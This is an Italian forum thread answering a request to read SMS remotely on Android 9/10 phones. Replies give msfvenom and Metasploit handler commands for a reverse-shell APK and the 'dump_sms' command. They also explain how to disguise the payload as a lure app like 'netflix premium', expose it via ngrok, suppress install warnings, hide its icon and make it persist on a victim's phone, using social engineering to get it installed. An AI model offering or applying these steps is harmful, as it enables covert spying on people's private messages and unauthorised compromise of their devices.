Domanda Risolto Leggere SMS da remoto - nuovi exploit Android 9.0 o 10?

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
haxo ha detto:
Ciao, potresti fare una cosa del genere:

dalla shell:

msfvenom -p android/meterpreter/reverse_tcp lhost=iplocale lport=porta> shell.apk
apri metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost iplocale
set lport porta
exploit

comunque, una volta avuto accesso al telefono, tramite il comando "dump_sms" dovresti riuscire a scaricare tutti gli SMS presenti.
penso sia un metodo generale perchè si tratta di inserire un file apk all'interno del telefono, magari ci riesci con un po di ingegneria sociale e hai fatto.

attento a non metterti nei guai, ciao bello.
Clicca per espandere...
Non credo che questa tecnica funzioni siccome l'APK che viene generato è vecchio, non rispetta più l'architettura android dalla versione 5.0 e viene individuata come app malevola in tutte le nuove versione di Android
 
  • Mi piace
  • Grazie
Reazioni: Anunnako, CRYP70, LinuxUser e un'altra persona
☣ᴋɪʟʟ ꜰᴏʀ ᴛʜᴇ ᴛʜʀɪʟʟ☣ ha detto:
Salve,

qualcuno è a conoscenza di nuovi exploit (o metodi in generale) per leggere SMS da remoto su smartphone con Android 9.0 o 10?

Grazie.
Clicca per espandere...
Capiti a pennello, io è da anni che mi sono incapato con un tool chiamato evil-droid che non sarebbe altro metasploit apposta per android reso più semplice e automatico, purtroppo non si possono utilizzare apk modificate come se fossero veritiere già da android 5 ma io ho provato sul mio s9 plus sia in versione android 9 che android 10 a installare l'apk maligno creato con evildroid e funzionavano quasi tutte le funzioni perfettamente anche l'invio di sms, quello che devi fare è installare evildroid da github sul tuo linux e insieme a quello tutte le dipendenze, poi ti chiederà che tipo di apk generare e dovrai selezionare icon changer che sarebbe l'apk predefinito di metasploit solo con l'icona cambiata (ti consiglio di prenderne una da internet come per esempio qualcosa che adeschi come netflix premium o cose cosi) una volta generato l'apk ovviamente scegli l'indirizzo ip a cui deve essere connesso (se ovviamente devi farlo over wifi dovresti fare port forwarding quindi o apri le porte da 192.168.1.1 del tuo modem e inserisci l'ip pubblico oppure usi ngrok che si connette al tuo ip locale e quindi nell'apk inserisci l'ip e la porta fornita da ngrok) una volta fatto tutto scaricando l'apk sul tuo android 9/10 vedrai che ti sconsiglia di installarlo perchè l'autore non e verificato, per eliminare questa avvertenza installa apk editor sul tuo android dove devi modificare l'apk e dovrai cambiare dei parametri non ricordo esattamente quali ma bastava modificare nelle impostazioni semplici ci sono due valori, 17 e 21, modifica il primo e deve risultare 21 anche lui e cosi alla vittima non uscirà l'avvertenza, una volta fatto l'apk è finito, unica pecca è quando la vittima lo va ad installare e prova ad aprirlo l'apk non si apre perchè è solo un processo in background, per questo consiglio di stare pronto con l'opzione hideiconapp in modo da nasconderla e successivamente rendere il processo persistente ovvero autoavviante con uno script shell se non ricordo male.
 
  • Mi piace
Reazioni: ☣ᴋɪʟʟ ꜰᴏʀ ᴛʜᴇ ᴛʜʀɪʟʟ☣
Ciao, potresti fare una cosa del genere:

dalla shell:

msfvenom -p android/meterpreter/reverse_tcp lhost=iplocale lport=porta> shell.apk
apri metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost iplocale
set lport porta
exploit

comunque, una volta avuto accesso al telefono, tramite il comando "dump_sms" dovresti riuscire a scaricare tutti gli SMS presenti.
penso sia un metodo generale perchè si tratta di inserire un file apk all'interno del telefono, magari ci riesci con un po di ingegneria sociale e hai fatto.

attento a non metterti nei guai, ciao bello.
 
Ultima modifica:
0xbro ha detto:
Non credo che questa tecnica funzioni siccome l'APK che viene generato è vecchio, non rispetta più l'architettura android dalla versione 5.0 e viene individuata come app malevola in tutte le nuove versione di Android
Clicca per espandere...
Di funzionare funziona (relativamente), circa 2 settimane fa ho testato con un Huaweii, peró il cellulare ti avverte chiaramente che l’APK potrebbe essere un app spia quindi credo nemmeno con un po’ di ingegneria sociale si riesce a fare installare l’APK, a meno che la persona non sia stupida, oltre questo dopo circa 30/45 secondi la sessione muore da sola, quindi se l’obbiettivo è quello di eseguire il dump degli sms si potrebbe fare ma sempre riuscendo a far installare l’APK
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

0
Discussione Ufficiale I migliori siti dove praticare Ethical Hacking nel 2024
  • Release
  • In evidenza
  • 10
  • 6K
10
6K
Pentesting e Ethical Hacking
MRPants
0
Guida Android Application Penetration Testing - Concetti e Basi
  • Release
  • 3
  • 3K
3
3K
Pentesting e Ethical Hacking Guide e Tools
0xbro
Discussione Messaggio Segreto da Assistente Google
  • 6
  • 602
6
602
Smartphone e Tablet
☣ᴋɪʟʟ ꜰᴏʀ ᴛʜᴇ ᴛʜʀɪʟʟ☣
0
Guida Cosa è un Penetration Test e quali sono le sue fasi
  • Release
  • In evidenza
  • 2
  • 3K
2
3K
Pentesting e Ethical Hacking Guide e Tools
MRPants
D
Mod Switch [GUIDA]Android su Nintendo Switch con Lineage OS 17.1 e Beta Lineage OS 18.1 (Android 11)
  • 9
  • 2K
9
2K
Nintendo Modding Guide e Tools
briscola1
Top Bottom
Indietro